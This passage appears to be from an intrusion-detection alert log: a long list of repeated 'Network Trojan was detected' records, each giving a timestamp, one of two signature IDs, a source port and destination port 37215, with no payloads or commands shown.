          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821239
          SID:2835222
          Source Port:41750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926880
          SID:2835222
          Source Port:33778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012829
          SID:2835222
          Source Port:58852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299431
          SID:2835222
          Source Port:47272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168710
          SID:2835222
          Source Port:37674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988372
          SID:2835222
          Source Port:54692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948122
          SID:2835222
          Source Port:42694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.296793
          SID:2829579
          Source Port:60314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162177
          SID:2829579
          Source Port:58610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163395
          SID:2835222
          Source Port:37682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471130
          SID:2829579
          Source Port:56110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606956
          SID:2829579
          Source Port:47292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.241865
          SID:2835222
          Source Port:36828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034004
          SID:2835222
          Source Port:52012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.569472
          SID:2835222
          Source Port:45796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169433
          SID:2829579
          Source Port:43500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861158
          SID:2835222
          Source Port:49764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166084
          SID:2829579
          Source Port:36148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818322
          SID:2835222
          Source Port:48380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.985308
          SID:2835222
          Source Port:54400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716730
          SID:2829579
          Source Port:51018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598642
          SID:2829579
          Source Port:59970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285124
          SID:2835222
          Source Port:56866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.464740
          SID:2829579
          Source Port:48854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103076
          SID:2835222
          Source Port:41050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931452
          SID:2829579
          Source Port:45570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165694
          SID:2835222
          Source Port:41172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539367
          SID:2835222
          Source Port:46840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306517
          SID:2829579
          Source Port:39270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.090062
          SID:2829579
          Source Port:44878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.646668
          SID:2829579
          Source Port:37152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416274
          SID:2829579
          Source Port:60712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417348
          SID:2835222
          Source Port:54650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643346
          SID:2829579
          Source Port:35080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539697
          SID:2829579
          Source Port:59116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292870
          SID:2829579
          Source Port:42204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928828
          SID:2829579
          Source Port:38296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467847
          SID:2835222
          Source Port:44604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538221
          SID:2835222
          Source Port:59680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823320
          SID:2829579
          Source Port:58818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.039077
          SID:2829579
          Source Port:47666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004090
          SID:2835222
          Source Port:43448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412952
          SID:2835222
          Source Port:40168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397867
          SID:2835222
          Source Port:42646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925237
          SID:2835222
          Source Port:60632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600462
          SID:2835222
          Source Port:58428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397381
          SID:2835222
          Source Port:56414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103071
          SID:2835222
          Source Port:34316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601820
          SID:2829579
          Source Port:59044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600898
          SID:2829579
          Source Port:40812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716555
          SID:2829579
          Source Port:57090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205227
          SID:2835222
          Source Port:40016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948496
          SID:2835222
          Source Port:58490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918187
          SID:2829579
          Source Port:42256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598206
          SID:2835222
          Source Port:51352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910332
          SID:2835222
          Source Port:56380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400398
          SID:2829579
          Source Port:33298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080228
          SID:2829579
          Source Port:53168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.079842
          SID:2835222
          Source Port:53412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566306
          SID:2829579
          Source Port:48020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412393
          SID:2829579
          Source Port:55674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861997
          SID:2835222
          Source Port:38208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861059
          SID:2829579
          Source Port:42118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926382
          SID:2835222
          Source Port:35734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892780
          SID:2835222
          Source Port:43166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205216
          SID:2835222
          Source Port:60398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819198
          SID:2829579
          Source Port:39406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077739
          SID:2829579
          Source Port:58464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606066
          SID:2835222
          Source Port:38556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289024
          SID:2829579
          Source Port:49388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860558
          SID:2835222
          Source Port:52634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284321
          SID:2829579
          Source Port:60638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721172
          SID:2829579
          Source Port:45818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029618
          SID:2829579
          Source Port:36792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929464
          SID:2835222
          Source Port:59026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.296952
          SID:2829579
          Source Port:55364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169378
          SID:2829579
          Source Port:47604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417819
          SID:2829579
          Source Port:48252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078669
          SID:2829579
          Source Port:53020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285943
          SID:2829579
          Source Port:36190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075501
          SID:2835222
          Source Port:51812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.300980
          SID:2835222
          Source Port:54812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289459
          SID:2829579
          Source Port:39806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478975
          SID:2829579
          Source Port:55222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.300967
          SID:2829579
          Source Port:52320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713016
          SID:2829579
          Source Port:45524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.079376
          SID:2835222
          Source Port:34886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465996
          SID:2829579
          Source Port:36640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644926
          SID:2829579
          Source Port:39326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102167
          SID:2835222
          Source Port:39828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.271826
          SID:2829579
          Source Port:53470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567668
          SID:2835222
          Source Port:42784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207854
          SID:2835222
          Source Port:47922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990507
          SID:2835222
          Source Port:32786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.951055
          SID:2835222
          Source Port:51448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017215
          SID:2829579
          Source Port:47186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557653
          SID:2835222
          Source Port:39210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077710
          SID:2829579
          Source Port:42912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597978
          SID:2829579
          Source Port:60240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250707
          SID:2829579
          Source Port:38668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944185
          SID:2835222
          Source Port:40574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.560325
          SID:2835222
          Source Port:57006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915834
          SID:2829579
          Source Port:43850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034538
          SID:2835222
          Source Port:34672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.688067
          SID:2829579
          Source Port:33856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905906
          SID:2835222
          Source Port:49320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540360
          SID:2835222
          Source Port:55344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288026
          SID:2835222
          Source Port:51358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285046
          SID:2829579
          Source Port:37264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299103
          SID:2835222
          Source Port:50474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.989972
          SID:2835222
          Source Port:33458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928233
          SID:2835222
          Source Port:45040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.134393
          SID:2835222
          Source Port:37028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.866197
          SID:2835222
          Source Port:49834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715488
          SID:2829579
          Source Port:49892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079534
          SID:2829579
          Source Port:49810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910563
          SID:2829579
          Source Port:41916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.893095
          SID:2835222
          Source Port:36054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717964
          SID:2829579
          Source Port:59606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.949875
          SID:2835222
          Source Port:33004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822437
          SID:2829579
          Source Port:57522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996498
          SID:2835222
          Source Port:55936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.266537
          SID:2835222
          Source Port:53258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162629
          SID:2835222
          Source Port:44258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471111
          SID:2835222
          Source Port:60084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821709
          SID:2835222
          Source Port:55422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.983354
          SID:2835222
          Source Port:50292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646281
          SID:2829579
          Source Port:60368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077532
          SID:2835222
          Source Port:52796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287947
          SID:2835222
          Source Port:54900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919510
          SID:2829579
          Source Port:48610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.593973
          SID:2829579
          Source Port:51908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399971
          SID:2829579
          Source Port:45412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.073714
          SID:2829579
          Source Port:48884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226719
          SID:2829579
          Source Port:57930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164587
          SID:2835222
          Source Port:48854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990780
          SID:2829579
          Source Port:48884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.682202
          SID:2835222
          Source Port:44208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644120
          SID:2835222
          Source Port:51668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227602
          SID:2829579
          Source Port:55940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950946
          SID:2835222
          Source Port:52804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168892
          SID:2835222
          Source Port:52616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290268
          SID:2835222
          Source Port:57858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714814
          SID:2835222
          Source Port:37936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294246
          SID:2829579
          Source Port:46530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288146
          SID:2829579
          Source Port:55804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418011
          SID:2835222
          Source Port:55104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287525
          SID:2829579
          Source Port:45466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.095960
          SID:2829579
          Source Port:44736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415496
          SID:2835222
          Source Port:39714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038485
          SID:2829579
          Source Port:32850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285800
          SID:2835222
          Source Port:54430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397828
          SID:2829579
          Source Port:55430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246141
          SID:2835222
          Source Port:59562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285108
          SID:2829579
          Source Port:46834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164668
          SID:2829579
          Source Port:55294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646407
          SID:2835222
          Source Port:60060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076434
          SID:2835222
          Source Port:47920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017988
          SID:2829579
          Source Port:43520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.155884
          SID:2829579
          Source Port:37694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602566
          SID:2835222
          Source Port:55392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164678
          SID:2829579
          Source Port:50988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948963
          SID:2835222
          Source Port:48448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029018
          SID:2835222
          Source Port:60514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419485
          SID:2829579
          Source Port:42352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291420
          SID:2829579
          Source Port:34174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.099677
          SID:2829579
          Source Port:48292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283623
          SID:2835222
          Source Port:49540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990728
          SID:2829579
          Source Port:55494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944830
          SID:2829579
          Source Port:58886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205768
          SID:2829579
          Source Port:34576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472440
          SID:2835222
          Source Port:56944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931361
          SID:2835222
          Source Port:43024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924565
          SID:2829579
          Source Port:60172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.411810
          SID:2835222
          Source Port:55274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162043
          SID:2829579
          Source Port:40592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718978
          SID:2835222
          Source Port:39662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032684
          SID:2829579
          Source Port:57386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993302
          SID:2835222
          Source Port:51142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537908
          SID:2835222
          Source Port:49518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948738
          SID:2835222
          Source Port:39012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821786
          SID:2835222
          Source Port:49076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914528
          SID:2829579
          Source Port:53124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.080021
          SID:2835222
          Source Port:37728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471679
          SID:2829579
          Source Port:52888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223689
          SID:2829579
          Source Port:53036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412216
          SID:2835222
          Source Port:43078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163046
          SID:2835222
          Source Port:56488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029410
          SID:2835222
          Source Port:53358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102987
          SID:2829579
          Source Port:38284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415746
          SID:2829579
          Source Port:40810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925481
          SID:2835222
          Source Port:58704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029709
          SID:2829579
          Source Port:42002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164298
          SID:2829579
          Source Port:56646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.288006
          SID:2835222
          Source Port:35420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.994347
          SID:2835222
          Source Port:43162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928988
          SID:2835222
          Source Port:45674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
